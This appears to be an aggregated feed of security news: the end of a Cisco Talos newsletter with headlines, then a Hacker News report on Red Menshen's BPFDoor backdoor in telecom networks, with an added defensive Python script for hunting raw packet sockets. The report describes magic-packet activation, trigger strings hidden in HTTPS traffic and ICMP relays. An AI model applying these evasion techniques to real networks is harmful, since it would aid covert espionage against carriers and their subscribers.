Identity-centric network components act as control points for the entire environment, meaning their compromise can invalidate MFA, bypass segmentation, and grant immediate access to high-value resources. Network management platforms give adversaries direct access to privileged administrative functions, device credentials, and automation pipelines that touch hundreds of downstream systems. Compromising a single ADC or management platform can expose dozens of downstream systems, making these devices powerful force multipliers. 

So now what? 

Organizations should consider the impact on identity when prioritizing the patching of network devices. ADCs must be protected as identity control points, not merely performance appliances. Defenders should focus on these high-leverage vulnerability classes that enable identity compromise, policy manipulation, and infrastructure-wide escalation. Read the full Year in Review for more information.

Top security headlines of the week 

U.S. Department of Energy publishes five-year energy security plan 
The three goals are to develop ‘world-class’ security technologies, to harden the US energy infrastructure, and to establish emergency preparedness for response and recovery from incidents. (SecurityWeek) 

Someone has publicly leaked an exploit kit that can hack millions of iPhones 
Researchers are warning that this will allow any hacker to easily use the tools to target iPhone users running older versions of Apple’s operating systems who have not yet updated to its latest iOS 26 software. (TechCrunch) 

Checkmarx KICS code scanner targeted in widening supply chain hit 
Specifically, the cybercriminals infiltrated KICS GitHub Action, which organizations use to run KICS scans within their CI/CD pipelines, and poisoned multiple versions of the software. (Dark Reading) 

Attackers hide infostealer in copyright infringement notices 
Aimed at organizations in critical sectors, including healthcare, government, hospitality, and education, it attempts to install PureLog Stealer, a low-cost infostealer easy for threat actors to use. (Dark Reading) 

Oracle releases emergency patch for critical identity manager vulnerability 
CVE-2026-21992 can be used without authentication for remote code execution and it may have been exploited in the wild. (SecurityWeek) 

Can’t get enough Talos? 

Today only: Ask us anything 
Talos and Splunk researchers are standing by on Reddit to answer your questions about the Year in Review, Top 50 Cybersecurity Threats report, or just about anything else you want to know. It’s halfway over, so post your questions now! 

Year in Review highlights 
In 2025, attackers moved fast, but they also played the long game. This short video highlights the biggest trends from the 2025 Talos Year in Review and what they reveal about where the threat landscape is headed. 

Gravy, glutes, and the Talos Year in Review 
Hazel, Bill, Joe, and Dave discuss the 2025 Year in Review, supported as always by the Turkey Lurkey Man. We also discuss the cyber activity tied to the situation in the Middle East. 

Cybersecurity’s double-header 
With the recent release of the Year in Review and Splunk’s Top 50 Cybersecurity Threats report, Amy, Bill, and Lou break down the most critical trends that shaped the security landscape last year. 

Upcoming events where you can find Talos 

Most prevalent malware files from Talos telemetry over the past week 




from Cisco Talos Blog https://ift.tt/NUeOGIf
via IFTTT

China-Linked Red Menshen Uses Stealthy BPFDoor Implants to Spy via Telecom Networks

A long-term and ongoing campaign attributed to a China-nexus threat actor has embedded itself in telecom networks to conduct espionage against government networks.

The strategic positioning activity, which involves implanting and maintaining stealthy access mechanisms within critical environments, has been attributed to Red Menshen, a threat cluster that's also tracked as Earth Bluecrow, DecisiveArchitect, and Red Dev 18. The group has a track record of striking telecom providers across the Middle East and Asia since at least 2021.

Rapid7 described the covert access mechanisms as "some of the stealthiest digital sleeper cells" ever encountered in telecommunications networks.

The campaign is characterized by the use of kernel-level implants, passive backdoors, credential-harvesting utilities, and cross-platform command frameworks, giving the threat actor the ability to persistently inhabit networks of interest. One of the most recognized tools in its malware arsenal is a Linux backdoor called BPFDoor.

"Unlike conventional malware, BPFdoor does not expose listening ports or maintain visible command-and-control channels," Rapid7 Labs said in a report shared with The Hacker News. "Instead, it abuses Berkeley Packet Filter (BPF) functionality to inspect network traffic directly inside the kernel, activating only when it receives a specifically crafted trigger packet."

"There is no persistent listener or obvious beaconing. The result is a hidden trapdoor embedded within the operating system itself."

The attack chains begin with the threat actor targeting internet-facing infrastructure and exposed edge services, such as VPN appliances, firewalls, and web-facing platforms associated with Ivanti, Cisco, Juniper Networks, Fortinet, VMware, Palo Alto Networks, and Apache Struts, to obtain initial access.

Upon gaining a successful foothold, Linux-compatible beacon frameworks such as CrossC2 are deployed to facilitate post-exploitation activities. Also dropped are Sliver, TinyShell (a Unix backdoor), keyloggers, and brute-force utilities to facilitate credential harvesting and lateral movement.

Central to Red Menshen's operations, however, is BPFDoor. It features two distinct components: One is a passive backdoor deployed on the compromised Linux system, which installs a BPF filter to inspect incoming traffic for a predefined "magic" packet and spawns a remote shell when one arrives. The other is a controller operated by the attacker and responsible for sending the specially formatted packets.
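A passive implant that inspects traffic in the kernel without opening a listening port still needs a raw AF_PACKET socket to attach its BPF filter to, and Linux records every such socket in /proc/net/packet. The hunting logic below, an added defensive example rather than anything from Rapid7's report or this article, correlates those socket inodes with the processes that hold them; the allowlist of legitimate packet-socket users and the process names in the constructed sample are assumptions, not indicators from the campaign.

```python
"""Hunt for processes holding AF_PACKET sockets, the raw sockets a BPF-filtering passive backdoor
needs to see traffic without a listening port. Pure functions over procfs text; runs on samples or live /proc."""
import os
import re

# Assumed allowlist of daemons that legitimately hold AF_PACKET sockets; tune it for your fleet.
EXPECTED_PACKET_USERS = {"dhclient", "dhcpcd", "NetworkManager", "tcpdump", "lldpd"}

def parse_packet_inodes(proc_net_packet):
    """Socket inodes from /proc/net/packet; the inode is the last column of each data row."""
    rows = proc_net_packet.splitlines()[1:]  # first line is the column header
    return {cols[-1] for cols in (r.split() for r in rows) if cols}

def socket_inodes(fd_targets):
    """Inodes of the sockets a process holds, from its /proc/<pid>/fd targets ('socket:[N]')."""
    return {m.group(1) for m in map(re.compile(r"socket:\[(\d+)\]").match, fd_targets) if m}

def find_raw_socket_owners(proc_net_packet, fds_by_pid, comm_by_pid):
    """Correlate AF_PACKET inodes to owning PIDs and flag owners not on the allowlist."""
    packet_inodes = parse_packet_inodes(proc_net_packet)
    findings = []
    for pid, targets in sorted(fds_by_pid.items()):
        hits = socket_inodes(targets) & packet_inodes
        if hits:
            comm = comm_by_pid.get(pid, "?")
            findings.append({"pid": pid, "comm": comm, "inodes": sorted(hits),
                             "expected": comm in EXPECTED_PACKET_USERS})
    return findings

def snapshot_live_procfs():
    """The same three inputs read from a live Linux /proc (root is needed to see every fd table)."""
    fds, comms = {}, {}
    for pid in (int(e) for e in os.listdir("/proc") if e.isdigit()):
        try:  # a process may exit mid-scan or have an unreadable fd table
            fds[pid] = [os.readlink(f"/proc/{pid}/fd/{n}") for n in os.listdir(f"/proc/{pid}/fd")]
            comms[pid] = open(f"/proc/{pid}/comm").read().strip()
        except OSError:
            pass
    return open("/proc/net/packet").read(), fds, comms

# Constructed sample: two AF_PACKET sockets, one held by dhclient, one by an invented process name.
SAMPLE_PROC_NET_PACKET = """sk               RefCnt Type Proto  Iface R Rmem   User   Inode
ffff9a3f1c2d0000 3      3    0003   2     1 0      0      41217
ffff9a3f1c2d8000 3      3    0003   2     1 0      0      58830
"""
SAMPLE_FDS = {1: ["/dev/null"], 812: ["socket:[41217]", "socket:[41220]"], 2931: ["socket:[58830]", "pipe:[58831]"]}
SAMPLE_COMM = {1: "systemd", 812: "dhclient", 2931: "kdmflush-helper"}

if __name__ == "__main__":
    print(*find_raw_socket_owners(SAMPLE_PROC_NET_PACKET, SAMPLE_FDS, SAMPLE_COMM), sep="\n")
```

Legitimate network daemons also hold packet sockets, so treat the output as a triage list rather than a verdict; `snapshot_live_procfs()` returns the same three inputs from a running host so the correlation can be rerun there.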

"The controller is also designed to operate within the victim’s environment itself," Rapid7 explained. "In this mode, it can masquerade as legitimate system processes and trigger additional implants across internal hosts by sending activation packets or by opening a local listener to receive shell connections, effectively enabling controlled lateral movement between compromised systems."

What's more, certain BPFDoor artifacts have been found to support the Stream Control Transmission Protocol (SCTP), potentially enabling the adversary to monitor telecom-native protocols and gain visibility into subscriber behavior and location, and even track individuals of interest.

These aspects show that BPFDoor's functionality goes beyond that of a stealthy Linux backdoor. "BPFdoor functions as an access layer embedded within the telecom backbone, providing long-term, low-noise visibility into critical network operations," the security vendor added.

It doesn't end there. A previously undocumented variant of BPFDoor incorporates architectural changes that make it more evasive and let it remain undetected for prolonged periods in modern enterprise and telecom environments. These include concealing the trigger packet within seemingly legitimate HTTPS traffic and introducing a novel parsing mechanism that ensures the string "9999" appears at a fixed byte offset within the request.

This camouflage lets the magic packet blend into HTTPS traffic without shifting the position of data inside the request; the implant can therefore always check for the marker at one fixed byte offset and, if it is present, interpret it as the activation command.

The newly discovered sample also debuts a "lightweight communication mechanism" that uses the Internet Control Message Protocol (ICMP) for communication between two infected hosts.

"These findings reflect a broader evolution in adversary tradecraft," Rapid7 said. "Attackers are embedding implants deeper into the computing stack — targeting operating system kernels and infrastructure platforms rather than relying solely on user-space malware."

"Telecom environments — combining bare-metal systems, virtualization layers, high-performance appliances, and containerized 4G/5G core components — provide ideal terrain for low-noise, long-term persistence. By blending into legitimate hardware services and container runtimes, implants can evade traditional endpoint monitoring and remain undetected for extended periods."



from The Hacker News https://ift.tt/nRkmG2u
via IFTTT